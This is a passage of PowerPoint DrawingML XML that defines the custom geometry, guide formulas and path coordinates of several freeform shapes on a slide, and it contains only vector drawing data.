                  <a:gd name="T24" fmla="*/ 315 w 752"/>
                  <a:gd name="T25" fmla="*/ 126 h 668"/>
                  <a:gd name="T26" fmla="*/ 362 w 752"/>
                  <a:gd name="T27" fmla="*/ 69 h 668"/>
                  <a:gd name="T28" fmla="*/ 441 w 752"/>
                  <a:gd name="T29" fmla="*/ 21 h 668"/>
                  <a:gd name="T30" fmla="*/ 567 w 752"/>
                  <a:gd name="T31" fmla="*/ 5 h 668"/>
                  <a:gd name="T32" fmla="*/ 641 w 752"/>
                  <a:gd name="T33" fmla="*/ 48 h 668"/>
                  <a:gd name="T34" fmla="*/ 704 w 752"/>
                  <a:gd name="T35" fmla="*/ 121 h 668"/>
                  <a:gd name="T36" fmla="*/ 745 w 752"/>
                  <a:gd name="T37" fmla="*/ 205 h 668"/>
                  <a:gd name="T38" fmla="*/ 751 w 752"/>
                  <a:gd name="T39" fmla="*/ 284 h 668"/>
                  <a:gd name="T40" fmla="*/ 725 w 752"/>
                  <a:gd name="T41" fmla="*/ 357 h 668"/>
                  <a:gd name="T42" fmla="*/ 641 w 752"/>
                  <a:gd name="T43" fmla="*/ 431 h 668"/>
                  <a:gd name="T44" fmla="*/ 598 w 752"/>
                  <a:gd name="T45" fmla="*/ 284 h 668"/>
                  <a:gd name="T46" fmla="*/ 625 w 752"/>
                  <a:gd name="T47" fmla="*/ 252 h 668"/>
                  <a:gd name="T48" fmla="*/ 625 w 752"/>
                  <a:gd name="T49" fmla="*/ 199 h 668"/>
                  <a:gd name="T50" fmla="*/ 598 w 752"/>
                  <a:gd name="T51" fmla="*/ 163 h 668"/>
                  <a:gd name="T52" fmla="*/ 572 w 752"/>
                  <a:gd name="T53" fmla="*/ 142 h 668"/>
                  <a:gd name="T54" fmla="*/ 541 w 752"/>
                  <a:gd name="T55" fmla="*/ 142 h 668"/>
                  <a:gd name="T56" fmla="*/ 494 w 752"/>
                  <a:gd name="T57" fmla="*/ 158 h 668"/>
                  <a:gd name="T58" fmla="*/ 451 w 752"/>
                  <a:gd name="T59" fmla="*/ 199 h 668"/>
                  <a:gd name="T60" fmla="*/ 446 w 752"/>
                  <a:gd name="T61" fmla="*/ 231 h 668"/>
                  <a:gd name="T62" fmla="*/ 473 w 752"/>
                  <a:gd name="T63" fmla="*/ 399 h 668"/>
                  <a:gd name="T64" fmla="*/ 473 w 752"/>
                  <a:gd name="T65" fmla="*/ 483 h 668"/>
                  <a:gd name="T66" fmla="*/ 462 w 752"/>
                  <a:gd name="T67" fmla="*/ 541 h 668"/>
                  <a:gd name="T68" fmla="*/ 431 w 752"/>
                  <a:gd name="T69" fmla="*/ 588 h 668"/>
                  <a:gd name="T70" fmla="*/ 378 w 752"/>
                  <a:gd name="T71" fmla="*/ 625 h 668"/>
                  <a:gd name="T72" fmla="*/ 241 w 752"/>
                  <a:gd name="T73" fmla="*/ 667 h 668"/>
                  <a:gd name="T74" fmla="*/ 157 w 752"/>
                  <a:gd name="T75" fmla="*/ 640 h 668"/>
                  <a:gd name="T76" fmla="*/ 53 w 752"/>
                  <a:gd name="T77" fmla="*/ 530 h 668"/>
                  <a:gd name="T78" fmla="*/ 5 w 752"/>
                  <a:gd name="T79" fmla="*/ 431 h 668"/>
                  <a:gd name="T80" fmla="*/ 0 w 752"/>
                  <a:gd name="T81" fmla="*/ 346 h 668"/>
                  <a:gd name="T82" fmla="*/ 68 w 752"/>
                  <a:gd name="T83" fmla="*/ 242 h 668"/>
                  <a:gd name="T84" fmla="*/ 210 w 752"/>
                  <a:gd name="T85" fmla="*/ 326 h 6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752" h="668">
                    <a:moveTo>
                      <a:pt x="194" y="336"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="194" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="336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1" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7196138" y="2498725"/>
                <a:ext cx="209550" cy="182563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 200 w 584"/>
                  <a:gd name="T1" fmla="*/ 221 h 505"/>
                  <a:gd name="T2" fmla="*/ 158 w 584"/>
                  <a:gd name="T3" fmla="*/ 247 h 505"/>
                  <a:gd name="T4" fmla="*/ 126 w 584"/>
                  <a:gd name="T5" fmla="*/ 278 h 505"/>
                  <a:gd name="T6" fmla="*/ 110 w 584"/>
                  <a:gd name="T7" fmla="*/ 310 h 505"/>
                  <a:gd name="T8" fmla="*/ 110 w 584"/>
                  <a:gd name="T9" fmla="*/ 325 h 505"/>
                  <a:gd name="T10" fmla="*/ 116 w 584"/>
                  <a:gd name="T11" fmla="*/ 347 h 505"/>
                  <a:gd name="T12" fmla="*/ 136 w 584"/>
                  <a:gd name="T13" fmla="*/ 368 h 505"/>
                  <a:gd name="T14" fmla="*/ 168 w 584"/>
                  <a:gd name="T15" fmla="*/ 378 h 505"/>
                  <a:gd name="T16" fmla="*/ 200 w 584"/>
                  <a:gd name="T17" fmla="*/ 378 h 505"/>
                  <a:gd name="T18" fmla="*/ 310 w 584"/>
                  <a:gd name="T19" fmla="*/ 478 h 505"/>
                  <a:gd name="T20" fmla="*/ 263 w 584"/>
                  <a:gd name="T21" fmla="*/ 494 h 505"/>
                  <a:gd name="T22" fmla="*/ 189 w 584"/>
                  <a:gd name="T23" fmla="*/ 504 h 505"/>
                  <a:gd name="T24" fmla="*/ 153 w 584"/>
                  <a:gd name="T25" fmla="*/ 498 h 505"/>
                  <a:gd name="T26" fmla="*/ 89 w 584"/>
                  <a:gd name="T27" fmla="*/ 462 h 505"/>
                  <a:gd name="T28" fmla="*/ 37 w 584"/>
                  <a:gd name="T29" fmla="*/ 394 h 505"/>
                  <a:gd name="T30" fmla="*/ 21 w 584"/>
                  <a:gd name="T31" fmla="*/ 357 h 505"/>
                  <a:gd name="T32" fmla="*/ 0 w 584"/>
                  <a:gd name="T33" fmla="*/ 299 h 505"/>
                  <a:gd name="T34" fmla="*/ 0 w 584"/>
                  <a:gd name="T35" fmla="*/ 273 h 505"/>
                  <a:gd name="T36" fmla="*/ 11 w 584"/>
                  <a:gd name="T37" fmla="*/ 226 h 505"/>
                  <a:gd name="T38" fmla="*/ 32 w 584"/>
                  <a:gd name="T39" fmla="*/ 184 h 505"/>
                  <a:gd name="T40" fmla="*/ 63 w 584"/>
                  <a:gd name="T41" fmla="*/ 147 h 505"/>
                  <a:gd name="T42" fmla="*/ 106 w 584"/>
                  <a:gd name="T43" fmla="*/ 116 h 505"/>
                  <a:gd name="T44" fmla="*/ 195 w 584"/>
                  <a:gd name="T45" fmla="*/ 63 h 505"/>
                  <a:gd name="T46" fmla="*/ 294 w 584"/>
                  <a:gd name="T47" fmla="*/ 16 h 505"/>
                  <a:gd name="T48" fmla="*/ 342 w 584"/>
                  <a:gd name="T49" fmla="*/ 5 h 505"/>
                  <a:gd name="T50" fmla="*/ 389 w 584"/>
                  <a:gd name="T51" fmla="*/ 0 h 505"/>
                  <a:gd name="T52" fmla="*/ 436 w 584"/>
                  <a:gd name="T53" fmla="*/ 10 h 505"/>
                  <a:gd name="T54" fmla="*/ 478 w 584"/>
                  <a:gd name="T55" fmla="*/ 31 h 505"/>
                  <a:gd name="T56" fmla="*/ 499 w 584"/>
                  <a:gd name="T57" fmla="*/ 47 h 505"/>
                  <a:gd name="T58" fmla="*/ 536 w 584"/>
                  <a:gd name="T59" fmla="*/ 89 h 505"/>
                  <a:gd name="T60" fmla="*/ 557 w 584"/>
                  <a:gd name="T61" fmla="*/ 121 h 505"/>
                  <a:gd name="T62" fmla="*/ 583 w 584"/>
                  <a:gd name="T63" fmla="*/ 200 h 505"/>
                  <a:gd name="T64" fmla="*/ 583 w 584"/>
                  <a:gd name="T65" fmla="*/ 221 h 505"/>
                  <a:gd name="T66" fmla="*/ 562 w 584"/>
                  <a:gd name="T67" fmla="*/ 304 h 505"/>
                  <a:gd name="T68" fmla="*/ 536 w 584"/>
                  <a:gd name="T69" fmla="*/ 341 h 505"/>
                  <a:gd name="T70" fmla="*/ 499 w 584"/>
                  <a:gd name="T71" fmla="*/ 373 h 505"/>
                  <a:gd name="T72" fmla="*/ 400 w 584"/>
                  <a:gd name="T73" fmla="*/ 436 h 505"/>
                  <a:gd name="T74" fmla="*/ 236 w 584"/>
                  <a:gd name="T75" fmla="*/ 200 h 505"/>
                  <a:gd name="T76" fmla="*/ 431 w 584"/>
                  <a:gd name="T77" fmla="*/ 257 h 505"/>
                  <a:gd name="T78" fmla="*/ 447 w 584"/>
                  <a:gd name="T79" fmla="*/ 247 h 505"/>
                  <a:gd name="T80" fmla="*/ 462 w 584"/>
                  <a:gd name="T81" fmla="*/ 231 h 505"/>
                  <a:gd name="T82" fmla="*/ 473 w 584"/>
                  <a:gd name="T83" fmla="*/ 200 h 505"/>
                  <a:gd name="T84" fmla="*/ 473 w 584"/>
                  <a:gd name="T85" fmla="*/ 178 h 505"/>
                  <a:gd name="T86" fmla="*/ 467 w 584"/>
                  <a:gd name="T87" fmla="*/ 163 h 505"/>
                  <a:gd name="T88" fmla="*/ 441 w 584"/>
                  <a:gd name="T89" fmla="*/ 137 h 505"/>
                  <a:gd name="T90" fmla="*/ 426 w 584"/>
                  <a:gd name="T91" fmla="*/ 131 h 505"/>
                  <a:gd name="T92" fmla="*/ 404 w 584"/>
                  <a:gd name="T93" fmla="*/ 126 h 505"/>
                  <a:gd name="T94" fmla="*/ 368 w 584"/>
                  <a:gd name="T95" fmla="*/ 137 h 505"/>
                  <a:gd name="T96" fmla="*/ 315 w 584"/>
                  <a:gd name="T97" fmla="*/ 157 h 505"/>
                  <a:gd name="T98" fmla="*/ 383 w 584"/>
                  <a:gd name="T99" fmla="*/ 289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84" h="505">
                    <a:moveTo>
                      <a:pt x="200" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="431" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="431" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="257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2" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7273925" y="2662238"/>
                <a:ext cx="212725" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 430 w 589"/>
                  <a:gd name="T1" fmla="*/ 258 h 495"/>
                  <a:gd name="T2" fmla="*/ 461 w 589"/>
                  <a:gd name="T3" fmla="*/ 237 h 495"/>
                  <a:gd name="T4" fmla="*/ 477 w 589"/>
                  <a:gd name="T5" fmla="*/ 205 h 495"/>
                  <a:gd name="T6" fmla="*/ 477 w 589"/>
                  <a:gd name="T7" fmla="*/ 190 h 495"/>
                  <a:gd name="T8" fmla="*/ 472 w 589"/>
                  <a:gd name="T9" fmla="*/ 174 h 495"/>
                  <a:gd name="T10" fmla="*/ 441 w 589"/>
                  <a:gd name="T11" fmla="*/ 137 h 495"/>
                  <a:gd name="T12" fmla="*/ 425 w 589"/>
                  <a:gd name="T13" fmla="*/ 132 h 495"/>
                  <a:gd name="T14" fmla="*/ 398 w 589"/>
                  <a:gd name="T15" fmla="*/ 132 h 495"/>
                  <a:gd name="T16" fmla="*/ 341 w 589"/>
                  <a:gd name="T17" fmla="*/ 147 h 495"/>
                  <a:gd name="T18" fmla="*/ 262 w 589"/>
                  <a:gd name="T19" fmla="*/ 179 h 495"/>
                  <a:gd name="T20" fmla="*/ 184 w 589"/>
                  <a:gd name="T21" fmla="*/ 216 h 495"/>
                  <a:gd name="T22" fmla="*/ 152 w 589"/>
